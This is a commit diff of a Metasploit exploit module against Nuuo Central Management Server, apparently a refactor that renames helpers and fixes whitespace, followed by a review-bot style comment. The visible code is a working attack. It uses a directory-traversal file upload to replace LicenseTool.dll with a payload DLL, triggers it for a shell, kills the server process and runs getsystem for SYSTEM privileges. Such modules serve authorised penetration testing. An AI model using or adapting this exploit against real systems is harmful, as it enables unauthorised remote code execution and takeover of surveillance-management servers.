Update nuuo_cms_fu.rb
parent
0685ebed76
commit
4e1d79ac4b
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Name' => "Nuuo Central Management Server Authenticated Arbitrary File Upload",
|
||||
'Description' => %q{
|
||||
The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the
|
||||
CMS Server.
|
||||
CMS Server.
|
||||
The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\)
|
||||
characters. Therefore, this function can be abused to overwrite any files in the installation
|
||||
drive of CMS Server.
|
||||
|
@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def on_new_session(client)
|
||||
if client.type == "meterpreter"
|
||||
print_warning("Please wait a bit while we clean up")
|
||||
print_warning("Please wait a bit while we clean up")
|
||||
client.sys.process.get_processes().each do |proc|
|
||||
if proc['name'] == "NCS_Server.exe"
|
||||
client.sys.process.kill(proc['pid'])
|
||||
|
@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
print_good("Successfully restored LicenseTool.dll!")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
# elevate privs to system (we're already Admin anyway), and we're done!
|
||||
client.run_cmd("getsystem")
|
||||
print_good("We should have SYSTEM now, enjoy your shell!")
|
||||
|
@ -71,30 +71,30 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
print_good("Anyway, enjoy your shell!")
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
login
|
||||
|
||||
if @session == nil
|
||||
def exploit
|
||||
nucs_login
|
||||
|
||||
if @nucs_session == nil
|
||||
fail_with(Failure::NoAccess, "Failed to login to Nuuo CMS")
|
||||
end
|
||||
|
||||
# Download and upload a backup of LicenseTool.dll, so that we can restore it at post
|
||||
# Download and upload a backup of LicenseTool.dll, so that we can restore it at post
|
||||
# and not nuke the CMS installation.
|
||||
@dll = rand_text_alpha(12)
|
||||
print_status("Backing up LicenseTool.dll to #{@dll}")
|
||||
dll_data = download_file("LicenseTool.dll")
|
||||
upload_file(@dll, dll_data)
|
||||
|
||||
dll_data = nucs_download_file("LicenseTool.dll")
|
||||
nucs_upload_file(@dll, dll_data)
|
||||
|
||||
print_status("Uploading payload...")
|
||||
upload_file("LicenseTool.dll", generate_payload_dll)
|
||||
nucs_upload_file("LicenseTool.dll", generate_payload_dll)
|
||||
|
||||
print_status("Sleeping 15 seconds...")
|
||||
sleep 15
|
||||
|
||||
print_status("Sending SENDLICFILE request, shell incoming!")
|
||||
license_data = rand_text_alpha(50..350)
|
||||
send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic",
|
||||
nucs_send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic",
|
||||
"Content-Length: " + license_data.length.to_s], license_data)
|
||||
end
|
||||
end
|
||||
|
|
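Review bot: The guard re-emitted in the last hunk, `if @nucs_session == nil`, compares to nil explicitly; idiomatic Ruby (and RuboCop's default) would be `fail_with(Failure::NoAccess, "Failed to login to Nuuo CMS") unless @nucs_session`, which also collapses the three-line `if`/`end` into one modifier line. The `nucs_` prefix is otherwise applied consistently to the login, download, upload and send calls in `exploit`; presumably those helpers now live in a shared mixin, but the hunk does not show where they are defined. `exploit` is fully visible here, whereas `on_new_session`, which the second and third hunks touch, runs past the end of those hunks.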